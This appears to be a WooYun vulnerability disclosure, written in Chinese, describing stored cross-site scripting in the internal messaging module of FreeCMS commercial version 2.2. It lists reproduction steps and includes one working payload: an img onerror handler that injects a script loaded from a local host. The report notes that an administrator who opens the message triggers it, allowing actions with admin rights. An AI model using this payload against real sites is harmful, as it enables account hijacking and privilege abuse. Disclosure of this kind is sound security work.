WooYun.org

1、涉及版本FreeCMS商业版V2.2
2、演示地址：http://www.freeteam.cn/site/FreeCMS/onlinedemo/index.html
3、在第二步的网页中选择会员中心，进入会员中心(可自己注册会员)
4、登录系统后，进入站内信模块，进行写信，在内容中嵌入恶意代码：

5、其它用户登录系统，查看短信，漏洞触发

6、使用Firebug查看页面源代码，恶意代码成功执行。

7、管理员查看用户发送的短信，漏洞同样触发：

8、修改短信内容为：<img/onerror=d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e); src=x> 用户登录系统查看短信，恶意代码执行，成功加载本地脚本：

修改本地脚本内容，我们可以进行针对性的攻击。例如：如果管理员触发漏洞，我们可以修改其它用户信息，使用管理员身份执行任意操作。